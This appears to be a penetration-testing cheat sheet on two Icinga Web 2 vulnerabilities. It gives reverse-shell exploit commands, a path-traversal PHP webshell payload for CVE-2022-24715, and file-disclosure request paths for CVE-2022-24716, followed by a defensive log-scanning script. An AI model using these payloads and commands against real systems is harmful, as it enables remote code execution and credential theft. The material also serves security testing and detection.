# Icinga Web Pentesting

### Remote Code Execution (CVE-2022-24715) <a href="#remote-code-execution-cve-2022-24715" id="remote-code-execution-cve-2022-24715"></a>

An authenticated user can execute arbitrary code.

#### Automation <a href="#automation" id="automation"></a>

[This repository](https://github.com/JacobEbben/CVE-2022-24715) automates the exploit and returns a reverse shell.

On the local machine, start a listener.

```shellscript
nc -lvnp 4444
```

Next, generate a PEM private key, download the script, and run it.

```shellscript
ssh-keygen -m pem
# Location: cert.pem
# Passphrase: (empty)

wget https://github.com/JacobEbben/CVE-2022-24715/blob/main/exploit.py
python3 exploit.py -t http://example.com/icingaweb2/ -I <local-ip> -P 4444 -u username -p password -e cert.pem
```

#### Manual Exploitation <a href="#manual-exploitation" id="manual-exploitation"></a>

\*This procedure has not been fully verified and may not work.

1. Prepare a PEM private key on the local machine.

   ```shellscript
   ssh-keygen -m pem
   # Location: cert.pem
   # Passphrase: (empty)
   ```
2. Log in to Icinga Web 2 and open the dashboard.
3. Go to Configuration → Application → Resources.
4. Click “Create a New Resource”.
5. In the New Resource window, select the Resource Type “SSH Identity”.
6. Fill in the other fields. For example:

   ```shellscript
   [Resource Name]
   evil

   [User]
   ../../../../../../../../../../../dev/shm/run.php

   [Private Key]
   <PEM_PRIVATE_KEY>
   \x00<?php system($_REQUEST["cmd"]);?>
   ```

   For the Private Key field, paste the contents of the PEM file we generated, followed by a newline, “\x00”, and the PHP webshell code.
7. Click Save Resource.

### Arbitrary File Disclosure (CVE-2022-24716) <a href="#arbitrary-file-disclosure-cve-2022-24716" id="arbitrary-file-disclosure-cve-2022-24716"></a>

An unauthenticated user can read arbitrary files.\
Assume the Icinga Web’s root directory is **`/icingaweb2`**.

```shellscript
/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/authentication.ini
/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/config.ini
/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/resources.ini
/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/roles.ini
/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/passwd
```

[This script](https://github.com/JacobEbben/CVE-2022-24716) automates the process.
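
To check whether the paths listed above were requested against an instance you operate, the following added example (not part of the original page or of the linked repositories) scans web access-log lines for non-asset requests under the `icinga-php-thirdparty` library prefix. It assumes Combined Log Format and a static-asset extension allow-list chosen for illustration; the sample log lines are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# Library asset prefix taken from the request paths listed above.
LIB_PREFIX = "/lib/icinga/icinga-php-thirdparty/"
# Assumption: legitimate requests under the prefix are static assets only.
ASSET_EXT = {"js", "css", "map", "png", "gif", "jpg", "svg", "ico",
             "woff", "woff2", "ttf", "eot"}
# Combined Log Format: ip ident user [time] "METHOD target PROTO" status bytes
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

def suspicious_hits(lines):
    """Return requests under LIB_PREFIX that do not look like static assets."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        ip, when, _method, target, status, size = m.groups()
        # Normalise percent-encoding and drop the query string before matching.
        path = unquote(urlsplit(target).path)
        idx = path.find(LIB_PREFIX)
        if idx == -1:
            continue
        rest = path[idx + len(LIB_PREFIX):]
        name = rest.rsplit("/", 1)[-1]
        ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
        if ext in ASSET_EXT:
            continue  # ordinary static asset
        hits.append({
            "ip": ip, "time": when, "requested": rest, "status": int(status),
            # A 200 with a body means the file content was returned.
            "served": status == "200" and size not in ("0", "-"),
        })
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Mar/2022:10:01:02 +0000] "GET /icingaweb2/lib/icinga/icinga-php-thirdparty/etc/passwd HTTP/1.1" 200 1873 "-" "curl/7.81.0"',
    '198.51.100.7 - - [10/Mar/2022:10:01:05 +0000] "GET /icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/resources.ini HTTP/1.1" 404 0 "-" "curl/7.81.0"',
    '203.0.113.20 - - [10/Mar/2022:10:02:00 +0000] "GET /icingaweb2/lib/icinga/icinga-php-thirdparty/asset/js/vendor.js HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.20 - - [10/Mar/2022:10:02:01 +0000] "GET /icingaweb2/dashboard HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_hits(SAMPLE_LOG):
        print(hit)
```

Any hit with `served` set to true means file contents left the server, so credentials stored in the disclosed configuration files should be rotated.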

### References <a href="#references" id="references"></a>

* [SonarSource](https://www.sonarsource.com/blog/path-traversal-vulnerabilities-in-icinga-web/)
